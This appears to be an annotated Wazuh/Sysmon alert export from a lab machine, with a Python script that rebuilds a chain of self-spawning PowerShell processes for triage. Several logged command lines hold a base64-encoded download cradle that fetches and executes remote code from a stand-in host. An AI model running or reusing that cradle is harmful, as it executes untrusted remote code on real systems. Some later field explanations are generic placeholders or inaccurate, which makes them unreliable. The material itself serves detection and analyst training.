TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00}
ParentProcessId: 1468
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" The message as rendered by Windows. The same fields are parsed into data.win.eventdata.* below, which is what the rules match on.
data.win.eventdata.utcTime: 2025-04-24 22:36:30.544 When the process was created, per Sysmon; 2.3 s after the previous powershell.exe in this chain.
data.win.eventdata.processGuid: {94294ddc-bcee-680a-e70a-000000000e00} Sysmon's unique, never-reused process identifier. Join key for every later event from this process, including the FileCreate alert that follows.
data.win.eventdata.processId: 11608 Windows PID. Reused after exit, so pivot on processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable: the stock Windows PowerShell 5.1 location.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource from the PE; same build as the earlier alert.
data.win.eventdata.description: Windows PowerShell Description string from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the PE version resource; a hint, not proof.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name from the version resource; matches the file name in image, so the binary was not renamed.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line, byte for byte the same as in the earlier Process Create: UTF-16LE base64 that decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test').
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Logon session; the same one as every other process in this chain.
data.win.eventdata.logonId: 0x26584 Logon session ID. Correlate with Security event 4624 for the logon type and source.
data.win.eventdata.terminalSessionId: 1 Windows session number; 1 is an interactive desktop session.
data.win.eventdata.integrityLevel: Medium Medium = standard, non-elevated user.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image file; identical to the earlier alert, so the same binary.
data.win.eventdata.parentProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00} Sysmon GUID of the parent. It is the processGuid of the first Process Create alert on this page (PID 1468): that process spawned this one.
data.win.eventdata.parentProcessId: 1468 PID of the parent process.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable of the parent; powershell.exe spawning powershell.exe is what rule 92057 keys on.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's full command line. Identical to commandLine, so the chain is self-replicating.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as; same as user, so no elevation between the two.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline. As with the earlier 92213 alert, the "executable" is PowerShell's own start-up test script in %TEMP% (see targetFilename below).
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast. The mapping is the rule's, not evidence from this file; judge T1105 from the encoded command in the Process Create alert.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 38 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534223.1196783 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event: Sysmon, so eventID is a Sysmon ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID; filter on it to catch every Sysmon event.
data.win.system.eventID: 11 Sysmon Event ID: 11 = FileCreate, logged when a file is created or overwritten. Not a classic Security-log ID.
data.win.system.version: 2 Schema version of the FileCreate event type.
data.win.system.level: 4 Event level: 4 = Informational. Sysmon writes everything at 4, so the level carries no severity signal.
data.win.system.task: 11 For Sysmon the task number mirrors the event ID; it is not a Security-log category.
data.win.system.opcode: 0 Low‑level opcode (0 = Info). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords; the reserved channel bit every event on this channel carries, so no use as a filter here.
data.win.system.systemTime: 2025-04-24T22:36:32.3062006Z When the event was written to the log, about 20 ms after the file creation recorded in eventdata.utcTime.
data.win.system.eventRecordID: 282850 Incremental log record number. Directly follows the Process Create above (282849), the same start-then-probe pattern as records 282818 and 282819.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the event, not the process that created the file (that is eventdata.processId).
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the event.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent read this from.
data.win.system.computer: Attacker Computer name stamped on the event; should match agent.name.
data.win.system.severityValue: INFORMATION Text rendering of level (INFORMATION, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:32.285
ProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00}
ProcessId: 11608
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ss5qtls3.nav.ps1
CreationUtcTime: 2025-04-24 22:36:32.285
User: Attacker\Attcker1" The message as rendered by Windows. The same fields are parsed into data.win.eventdata.* below, which is what the rules match on.
data.win.eventdata.utcTime: 2025-04-24 22:36:32.285 When the file was created, per Sysmon; 1.7 s after the process in the alert above started.
data.win.eventdata.processGuid: {94294ddc-bcee-680a-e70a-000000000e00} Sysmon GUID of the process that wrote the file. It equals the processGuid of the Process Create alert directly above (PID 11608), so this file belongs to that encoded PowerShell.
data.win.eventdata.processId: 11608 PID of the writing process. PIDs get reused, so join on processGuid.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ss5qtls3.nav.ps1 Path of the created file. Same __PSScriptPolicyTest_<random>.ps1 pattern as the earlier 92213 alert: PowerShell's own AppLocker/WDAC start-up probe, not a dropped payload. Each new powershell.exe in this chain writes one, which is why 92213 keeps firing.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:32.285 Creation timestamp on the file; equal to utcTime, so a brand-new file rather than an overwrite.
data.win.eventdata.user: Attacker\\Attcker1 Account that wrote the file.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
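The Process Create and FileCreate alerts on this page are linked only by ProcessGuid / ParentProcessGuid, and the dashboard shows them as unrelated alerts. This added Python example (not Wazuh code, and not part of the alert data) rebuilds the tree from those join keys: it indexes Process Create events by processGuid, hangs each FileCreate off the process that wrote it, and labels the __PSScriptPolicyTest_*.ps1 files as PowerShell's own start-up policy probe rather than a dropped payload. The event records are constructed from the alerts on this page, reduced to the join fields; function names are this example's own.

```python
import re
from ntpath import basename  # Windows path semantics even when run on Linux

# Constructed from the Sysmon alerts on this page: the join fields of the
# Process Create (EID 1) and FileCreate (EID 11) events, nothing else.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PROCESS_CREATES = [
    {"guid": "{94294ddc-bcec-680a-e50a-000000000e00}", "pid": 1468, "image": PS,
     "utc": "2025-04-24 22:36:28.213",
     "parent_guid": "{94294ddc-bce8-680a-e30a-000000000e00}", "parent_pid": 14284, "parent_image": PS},
    {"guid": "{94294ddc-bcee-680a-e70a-000000000e00}", "pid": 11608, "image": PS,
     "utc": "2025-04-24 22:36:30.544",
     "parent_guid": "{94294ddc-bcec-680a-e50a-000000000e00}", "parent_pid": 1468, "parent_image": PS},
    {"guid": "{94294ddc-bcf1-680a-e90a-000000000e00}", "pid": 9396, "image": PS,
     "utc": "2025-04-24 22:36:33.276",
     "parent_guid": "{94294ddc-bcee-680a-e70a-000000000e00}", "parent_pid": 11608, "parent_image": PS},
]
FILE_CREATES = [
    {"guid": "{94294ddc-bcec-680a-e50a-000000000e00}", "utc": "2025-04-24 22:36:29.700",
     "target": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_eamq14se.2pz.ps1"},
    {"guid": "{94294ddc-bcee-680a-e70a-000000000e00}", "utc": "2025-04-24 22:36:32.285",
     "target": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ss5qtls3.nav.ps1"},
]

# PowerShell writes __PSScriptPolicyTest_<rand>.<rand>.ps1 into %TEMP% at
# start-up to learn whether AppLocker/WDAC constrains scripts. Benign by itself.
_POLICY_PROBE = re.compile(r"^__PSScriptPolicyTest_[A-Za-z0-9]+\.[A-Za-z0-9]+\.ps1$", re.IGNORECASE)


def classify_file(path: str) -> str:
    """'powershell_policy_probe' for the start-up test script, else 'review'."""
    if "\\temp\\" in path.lower() and _POLICY_PROBE.match(basename(path)):
        return "powershell_policy_probe"
    return "review"


def _node(pid=None, image=None, parent_guid=None):
    return {"pid": pid, "image": image, "parent_guid": parent_guid, "children": [], "files": []}


def build_tree(proc_events):
    """Index EID 1 events by ProcessGuid and link each to its parent.

    A parent whose own creation was never seen (PID 14284 here) becomes a
    placeholder root filled from the child's Parent* fields."""
    tree = {}
    for ev in proc_events:
        node = tree.setdefault(ev["guid"], _node())
        node.update(pid=ev["pid"], image=ev["image"], parent_guid=ev["parent_guid"], utc=ev["utc"])
        parent = tree.setdefault(ev["parent_guid"], _node(ev["parent_pid"], ev["parent_image"]))
        parent["children"].append(ev["guid"])
    return tree


def attach_files(tree, file_events):
    """Hang each EID 11 event off the process whose ProcessGuid it carries."""
    for ev in file_events:
        node = tree.get(ev["guid"])
        if node is not None:  # skip files from processes whose start was never seen
            node["files"].append({"target": ev["target"], "utc": ev["utc"],
                                  "verdict": classify_file(ev["target"])})


def roots(tree):
    return [g for g, n in tree.items() if n["parent_guid"] not in tree]


def chain(tree, guid):
    """PIDs from the root down to guid, following ParentProcessGuid links."""
    pids = []
    while guid in tree:
        pids.append(tree[guid]["pid"])
        guid = tree[guid]["parent_guid"]
    return pids[::-1]


def render(tree, guid=None, depth=0):
    """Indented text tree: one line per process, one per file it created."""
    lines = []
    for g in ([guid] if guid else roots(tree)):
        n = tree[g]
        lines.append("  " * depth + f"{basename(n['image'])} pid={n['pid']} guid={g}")
        for f in n["files"]:
            lines.append("  " * (depth + 1) + f"-> {basename(f['target'])} [{f['verdict']}]")
        for child in n["children"]:
            lines.extend(render(tree, child, depth + 1))
    return lines


if __name__ == "__main__":
    t = build_tree(PROCESS_CREATES)
    attach_files(t, FILE_CREATES)
    print("\n".join(render(t)))
```

The rendered tree reads 14284 → 1468 → 11608 → 9396, every node a powershell.exe carrying the same encoded command, with one policy-probe file under each of the two middle processes. That self-replicating chain, not the files in Temp, is the finding; the 92213 alerts are noise that the tree explains.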
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline. Third firing of the same pattern on this page: parent and child are both powershell.exe with the same -EncodedCommand download cradle.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 35 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534224.1199552 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event: Sysmon, so eventID is a Sysmon ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID; filter on it to catch every Sysmon event.
data.win.system.eventID: 1 Sysmon Event ID: 1 = Process Create. Not a classic Security-log ID such as 4624 or 4688.
data.win.system.version: 5 Schema version of the Process Create event type.
data.win.system.level: 4 Event level: 4 = Informational. Sysmon writes everything at 4, so the level carries no severity signal.
data.win.system.task: 1 For Sysmon the task number mirrors the event ID; it is not a Security-log category.
data.win.system.opcode: 0 Low‑level opcode (0 = Info). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords; the reserved channel bit every event on this channel carries, so no use as a filter here.
data.win.system.systemTime: 2025-04-24T22:36:34.8707334Z When the event was written to the log. The process started at eventdata.utcTime (22:36:33.276), about 1.6 s earlier; build timelines from utcTime.
data.win.system.eventRecordID: 282895 Incremental log record number. 44 Sysmon events were logged between the FileCreate above (282850) and this one without raising alerts; pull them by record ID if you need the full story.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the event, not the process being reported.
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the event.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent read this from.
data.win.system.computer: Attacker Computer name stamped on the event; should match agent.name.
data.win.system.severityValue: INFORMATION Text rendering of level (INFORMATION, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:33.276
ProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00}
ProcessId: 9396
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00}
ParentProcessId: 11608
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" The message as rendered by Windows. The same fields are parsed into data.win.eventdata.* below, which is what the rules match on.
data.win.eventdata.utcTime: 2025-04-24 22:36:33.276 When the process was created, per Sysmon; 2.7 s after the previous powershell.exe in this chain.
data.win.eventdata.processGuid: {94294ddc-bcf1-680a-e90a-000000000e00} Sysmon's unique, never-reused process identifier; join key for every later event from this process.
data.win.eventdata.processId: 9396 Windows PID. Reused after exit, so pivot on processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable: the stock Windows PowerShell 5.1 location.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource from the PE; same build as the earlier alerts.
data.win.eventdata.description: Windows PowerShell Description string from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the PE version resource; a hint, not proof.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name from the version resource; matches the file name in image, so the binary was not renamed.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line, unchanged from the earlier Process Creates: UTF-16LE base64 that decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test').
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Logon session; the same one as every other process in this chain.
data.win.eventdata.logonId: 0x26584 Logon session ID. Correlate with Security event 4624 for the logon type and source.
data.win.eventdata.terminalSessionId: 1 Windows session number; 1 is an interactive desktop session.
data.win.eventdata.integrityLevel: Medium Medium = standard, non-elevated user.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image file; identical to the earlier alerts, so the same binary.
data.win.eventdata.parentProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00} Sysmon GUID of the parent. It is the processGuid of the previous Process Create alert (PID 11608), which was itself spawned by PID 1468: the chain is 14284 → 1468 → 11608 → 9396.
data.win.eventdata.parentProcessId: 11608 PID of the parent process.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable of the parent; powershell.exe spawning powershell.exe is what rule 92057 keys on.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's full command line. Identical to commandLine, so the chain is self-replicating.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 39 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534224.1207619 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:35.2004628Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282896 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:35.096
ProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00}
ProcessId: 9396
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_loeo3cho.3ts.ps1
CreationUtcTime: 2025-04-24 22:36:35.096
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:35.096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcf1-680a-e90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9396 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_loeo3cho.3ts.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:35.096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534224.1210384 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:37.6992031Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43836 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
